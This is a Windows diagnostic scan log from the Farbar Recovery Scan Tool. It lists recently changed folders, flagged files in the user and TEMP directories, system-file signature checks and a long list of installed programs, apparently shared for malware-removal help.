2014-10-17 11:37 - 2008-12-22 17:50 - 00000000 ____D () C:\Users\RA Media Server
2014-10-17 11:10 - 2008-12-22 19:44 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\uTorrent
2014-10-17 10:48 - 2006-11-02 06:33 - 00000000 __RSD () C:\Windows\Media
2014-10-17 10:10 - 2008-12-25 17:52 - 00000000 ____D () C:\Windows\Minidump
2014-10-17 09:57 - 2013-07-18 18:11 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-17 09:10 - 2006-11-02 05:35 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-10-17 08:53 - 2008-12-22 12:21 - 00000000 ____D () C:\Users\Ashley
2014-10-14 11:41 - 2009-05-12 15:42 - 00000000 ____D () C:\ProgramData\Lx_cats
2014-10-14 09:49 - 2010-08-07 21:50 - 00006080 _____ () C:\Users\Guest\AppData\Local\d3d9caps.dat
2014-10-10 14:07 - 2012-04-26 14:19 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-10-10 13:29 - 2013-11-27 23:16 - 00000000 ____D () C:\ProgramData\Origin
2014-10-10 13:29 - 2008-12-26 16:54 - 00000000 ____D () C:\ProgramData\Electronic Arts
2014-10-10 13:11 - 2009-11-24 21:51 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Notepad++
2014-10-10 12:47 - 2014-07-01 16:25 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-10 12:14 - 2006-11-02 06:33 - 00000000 ____D () C:\Windows\security
2014-10-10 11:23 - 2014-03-27 07:02 - 00000000 ____D () C:\Users\Ashley\Desktop\secprogs
2014-10-10 11:23 - 2014-03-27 07:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paterva
2014-10-10 09:43 - 2009-04-06 21:09 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Malwarebytes
2014-10-10 09:42 - 2011-07-13 15:01 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-10-10 09:42 - 2009-04-06 21:09 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-09 12:26 - 2010-07-04 19:51 - 00000000 ____D () C:\Users\Guest\AppData\Roaming\Mozilla
2014-10-01 09:51 - 2014-03-15 11:59 - 00000000 ____D () C:\Users\Guest\Desktop\Old Firefox Data
2014-09-26 10:09 - 2010-07-04 19:48 - 00000000 ____D () C:\Users\Guest
2014-09-23 15:56 - 2012-09-29 15:45 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-23 15:56 - 2012-09-29 15:45 - 00003684 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-23 15:56 - 2011-05-14 05:53 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
 
Files to move or delete:
====================
C:\Users\Ashley\1535_A06.EXE
C:\Users\Ashley\jagex_runescape_preferences.dat
C:\Users\Ashley\R182272_DellVideoChat_Setup_support.exe
C:\Users\Ashley\R186378.exe
C:\Users\Ashley\R197267.exe
 
 
Some content of TEMP:
====================
C:\Users\Administrator\AppData\Local\Temp\gtalkwmp1.dll
C:\Users\Ashley\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Games\AppData\Local\Temp\AutoRun.exe
C:\Users\Games\AppData\Local\Temp\AutoRunGUI.dll
C:\Users\Games\AppData\Local\Temp\uttAC59.tmp.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-18 12:27
 
==================== End Of Log ============================
 
 
 
Addition.txt
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2014
Ran by Ashley at 2014-10-17 13:20:35
Running from C:\Users\Ashley\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
 Update for Microsoft Office 2007 (KB2508958) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
3DVIA player 5.0 (HKLM-x32\...\{4E868D3D-6EEB-4273-926C-2287236B5B79}) (Version: 5.0.0.10 - 3DVIA)
64 Bit HP CIO Components Installer (Version: 6.2.2 - Hewlett-Packard) Hidden
7500_7600_7700_Help1 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Activation (Blu-ray Disc Authoring Plug-in) (HKLM-x32\...\{44f4c6bb-4266-4e30-9151-5e360032c4aa}) (Version:  - Nero AG)
Activation (Blu-ray Video Plug-in) (HKLM-x32\...\{4d0b7bbb-7831-4205-8763-5f229166fa0a}) (Version:  - Nero AG)
Activation (Gracenote Plug-in) (HKLM-x32\...\{0344678f-079c-47f0-acd0-c61057ba2817}) (Version:  - Nero AG)
Activation (Nero 9 HD) (HKLM-x32\...\{ca9bea0e-2c22-4fd7-9dc2-3c1155ee63a1}) (Version:  - Nero AG)
Activation (Nero BackItUp 4) (HKLM-x32\...\{3fb777c3-2933-46ff-9635-26ca90c8ace6}) (Version:  - Nero AG)
Activation (Nero MediaHome 4) (HKLM-x32\...\{8ac94ba8-cdd7-437e-902b-65134d31b88c}) (Version:  - Nero AG)
Activation (Nero Move it) (HKLM-x32\...\{b31643c8-9f44-4aba-814f-e9e3593f0685}) (Version:  - Nero AG)
ActivePerl 5.12.3 Build 1204 (HKLM-x32\...\{9C7D3BA9-F21F-4F64-AF53-427DE90883AF}) (Version: 5.12.1204 - ActiveState)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.5.1.17730 - Adobe Systems Inc.)
Adobe AIR (x32 Version: 2.5.1.17730 - Adobe Systems Inc.) Hidden
Adobe Anchor Service CS3 (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Asset Services CS3 (x32 Version: 3 - Adobe Systems Incorporated) Hidden
Adobe Bridge CS3 (x32 Version: 2 - Adobe Systems Incorporated) Hidden
Adobe Bridge Start Meeting (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Camera Raw 4.0 (x32 Version: 4.0 - Adobe Systems Incorporated) Hidden
Adobe CMaps (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Color - Photoshop Specific (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Color Common Settings (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Color EU Extra Settings (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Color JA Extra Settings (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Color NA Recommended Settings (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.4.980 - Adobe Systems Incorporated.)
Adobe Community Help (x32 Version: 3.4.980 - Adobe Systems Incorporated.) Hidden
Adobe Default Language CS3 (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Device Central CS3 (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Digital Editions (HKLM-x32\...\Digital Editions) (Version:  - )
Adobe Download Manager (HKLM-x32\...\{E2883E8F-472F-4fb0-9522-AC9BF37916A7}) (Version: 1.6.2.48 - NOS Microsystems Ltd.)
Adobe ExtendScript Toolkit 2 (x32 Version: 2.0 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Fonts All (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Help Viewer CS3 (x32 Version: 1 - Adobe Systems Incorporated) Hidden
Adobe Linguistics CS3 (x32 Version: 3.0.0 - Adobe Systems Incorporated) Hidden
Adobe Photoshop CS3 (HKLM-x32\...\Adobe_2ac78060bc5856b0c1cf873bb919b58) (Version: 10.0 - Adobe Systems Incorporated)
Adobe Photoshop CS5.1 (HKLM-x32\...\{9158FF30-78D7-40EF-B83E-451AC5334640}) (Version: 12.1 - Adobe Systems Incorporated)
Adobe Reader X (10.1.4) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.4 - Adobe Systems Incorporated)
Adobe Setup (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.2.122 - Adobe Systems, Inc.)
Adobe Stock Photos CS3 (x32 Version: 1.5 - Adobe Systems Incorporated) Hidden
Adobe Update Manager CS3 (x32 Version: 5.1.0 - Adobe Systems Incorporated) Hidden
Adobe Version Cue CS3 Client (x32 Version: 3 - Adobe Systems Incorporated) Hidden
Adobe XMP Panels CS3 (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Advanced Audio FX Engine (HKLM-x32\...\Advanced Audio FX Engine) (Version:  - )
Advertising Center (x32 Version: 0.0.0.1 - Nero AG) Hidden
AIM 7 (HKLM-x32\...\AIM_7) (Version:  - )
Akamai NetSession Interface (HKCU\...\Akamai) (Version:  - Akamai Technologies, Inc)
Apache HTTP Server 2.2.17 (HKLM-x32\...\{85262A06-2D8C-4BC1-B6ED-5A705D09CFFC}) (Version: 2.2.17 - Apache Software Foundation)
Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B678797F-DF38-4556-8A31-8B818E261868}) (Version: 8.0.0.23 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version:  - )
AutoUpdate (HKLM-x32\...\{18D10072035C4515918F7E37EAFAACFC}) (Version: 1.1 - )
Banctec Service Agreement (HKLM-x32\...\{42D68A86-DB1C-4256-B8C9-5D0D92919AF5}) (Version: 2.0.0 - Dell Inc.)
Blu-ray Disc Authoring Plug-in (HKLM-x32\...\{91899fbd-195a-4f7e-85da-5d943ec2d4c9}) (Version:  - Nero AG)
Blu-ray Video Plug-in (HKLM-x32\...\{774200cd-39a2-490a-9e5a-cc05ce176741}) (Version:  - Nero AG)
Blu-ray/HD DVD Video Plug-in (HKLM-x32\...\{51f6fbf1-ea07-4d31-8014-08f809ad240c}) (Version:  - Nero AG)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
bpd_scan_Carrier (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
BufferChm (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.03 - Piriform)
Choice Guard (x32 Version: 1.2.87.0 - Microsoft Corporation) Hidden
Cisco EAP-FAST Module (HKLM-x32\...\{415B2719-AD3A-4944-B404-C472DB6085B3}) (Version: 2.1.6 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{83770D14-21B9-44B3-8689-F7B523F94560}) (Version: 1.0.12 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{669C7BD8-DAA2-49B6-966C-F1E2AAE6B17E}) (Version: 1.0.13 - Cisco Systems, Inc.)
ConvertXtoDVD 4.0.9.322 (HKLM-x32\...\{DB6AB705-C9BD-40E3-8929-2EA57F36A4FF}_is1) (Version: 4.0.9.322 - )
CrystalDiskInfo 5.6.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 5.6.2 - Crystal Dew World)
Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)
Dell Remote Access (HKLM-x32\...\{F66A31D9-7831-4FBA-BA02-C411C0047CC5}) (Version: 1.0.0.0 - Dell Inc.)
Dell System Detect (HKCU\...\9204f5692a8faf3b) (Version: 5.4.0.4 - Dell)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.102.101.104 - Alps Electric)
Dell Video Chat (remove only) (HKLM-x32\...\Dell Video Chat) (Version: 6.0 (6551) - SightSpeed Inc.)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version:  - )
Dell Wireless WLAN Card Utility (HKLM\...\Broadcom 802.11 Application) (Version: 5.10.38.30 - Dell Inc.)
Deluge 1.3.9 (HKLM-x32\...\Deluge) (Version:  - )
Dev-C++ 5 beta 9 release (4.9.9.2) (HKLM-x32\...\Dev-C++) (Version:  - )
DivX Codec (HKLM-x32\...\{7B63B2922B174135AFC0E1377DD81EC2}) (Version: 6.8.5 - DivX, Inc.)
DivX Version Checker (HKLM-x32\...\{3FC7CBBC4C1E11DCA1A752EA55D89593}) (Version: 7.0.0.19 - DivX, Inc.)
DjVu Solo 3.1 (HKLM-x32\...\DjVu Solo 3.1) (Version:  - )
DolbyFiles (x32 Version: 2.0 - Nero AG) Hidden
Driver Booster (HKLM-x32\...\Driver Booster_is1) (Version: 1.4 - IObit)
DTS Plug-in (HKLM-x32\...\{608a42f6-0644-498b-aa62-b975f565e58f}) (Version:  - Nero AG)
DVD Flick 1.3.0.7 (HKLM-x32\...\DVD Flick_is1) (Version: 1.3.0.7 - Dennis Meuwissen)
EDocs (HKLM-x32\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )
Elizabeth Find MD - Diagnosis Mystery (HKLM-x32\...\Elizabeth Find MD - Diagnosis Mystery1.0) (Version: 1.0 - Adnan_Boy 2008)
Farmers Market (HKLM-x32\...\Farmers Market1.0) (Version: 1.0 - AllSmartGames)
FLAC 1.2.1b (remove only) (HKLM-x32\...\FLAC) (Version: 1.2.1b - Xiph.org)
Foxit PDF Editor (HKLM-x32\...\Foxit PDF Editor) (Version: 2.2.0.0205 - Foxit Software)
Foxit Reader (HKLM-x32\...\Foxit Reader) (Version: 4.3.1.323 - Foxit Corporation)
GameHouse Games Collection: Crystal Path (HKLM-x32\...\Crystal Path) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.101 - Google Inc.)
Google Drive (HKLM-x32\...\{C6640705-7479-4EE5-BC86-879F05F65E74}) (Version: 1.17.7290.4094 - Google, Inc.)
Google Talk (remove only) (HKLM-x32\...\{226b64e8-dc75-4eea-a6c8-abcb496320f2}-Google Talk) (Version:  - )
Google Talk Plugin (HKLM-x32\...\{F7770F7F-0ABC-30CB-95BC-93761A05CAB6}) (Version: 5.38.4.0 - Google)
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
Gracenote Plug-in (HKLM-x32\...\{de0e0bf0-ce73-481f-bedf-0f15a6433a6c}) (Version:  - Nero AG)
HijackThis 2.0.2 (HKLM-x32\...\HijackThis) (Version: 2.0.2 - TrendMicro)
HP OfficeJet L7300/L7500/7600/7700 (HKLM\...\{A818DAE1-EBBE-4438-B557-8115955D88E4}) (Version: 14.0 - HP)
HTC Driver Installer (HKLM-x32\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 2.0.7.018 - HTC Corporation)
HTC Sync (HKLM-x32\...\{ECAC39CD-5819-4D45-813E-C48A192F7219}) (Version: 2.0.35 - HTC Corporation)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6162.3 - IDT)
ImagXpress (x32 Version: 7.0.74.0 - Nero AG) Hidden
Integrated Webcam Driver (1.06.03.0309)   (HKLM\...\Creative OA001) (Version: 1.06.03.0309 - Creative Technology Ltd.)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
ITECIR (HKLM-x32\...\{F6BB6248-C507-46FE-8A35-1B16F35E0441}) (Version: 1.9 - ITE)
iTunes (HKLM\...\{F46AA0F1-E284-4878-A462-5F11B9166C0E}) (Version: 11.4.0.18 - Apple Inc.)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217067FF}) (Version: 7.0.670 - Oracle)
Java Auto Updater (x32 Version: 2.1.67.1 - Oracle, Inc.) Hidden
Java™ SE Development Kit 6 Update 11 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0160110}) (Version: 1.6.0.110 - Sun Microsystems, Inc.)
Kits Configuration Installer (x32 Version: 8.37.0 - Microsoft) Hidden
L7000_Basic (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden
Lexmark 5600-6600 Series (HKLM\...\Lexmark 5600-6600 Series) (Version:  - Lexmark International, Inc.)
Lexmark Printable Web (HKLM-x32\...\{D2C5E510-BE6D-42CC-9F61-E4F939078474}) (Version: 1.0.0.0 - )
Life Quest 1.00 (HKLM-x32\...\Life Quest 1.00) (Version:  - )
Live! Cam Avatar Creator (HKLM-x32\...\{65D0C510-D7B6-4438-9FC8-E6B91115AB0D}) (Version: 4.6.1419.1 - Creative Technology Ltd)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
MediaDirect (HKLM-x32\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Baseline Security Analyzer 2.2 (HKLM\...\{08C3441C-4FAF-48D3-A551-70DD6031734F}) (Version: 2.2.2170 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (x32 Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft VC9 runtime libraries (x32 Version: 1.0.0 - AOL LLC) Hidden
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
Microsoft_VC80_ATL_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_ATL_x86_x64 (Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_CRT_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_CRT_x86_x64 (Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFC_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFC_x86_x64 (Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFCLOC_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFCLOC_x86_x64 (Version: 80.50727.4053 - Adobe) Hidden
Microsoft_VC90_ATL_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_ATL_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_CRT_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_CRT_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFC_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFC_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFCLOC_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFCLOC_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
MinGW-Get version 0.4-alpha-1 (HKLM-x32\...\{AC2C1BDB-1E91-4F94-B99C-E716FE2E9C75}_is1) (Version: 0.4-alpha-1 - MinGW)
Mozilla Firefox 32.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 32.0.2 (x86 en-US)) (Version: 32.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
mp3PRO Plug-in (HKLM-x32\...\{9cd15289-0ff2-4ab9-9b8b-d3a120b43c84}) (Version:  - Nero AG)
MSVCRT (x32 Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB936181) (HKLM-x32\...\{C04E32E0-0416-434D-AFB9-6969D703A9EF}) (Version: 4.20.9848.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
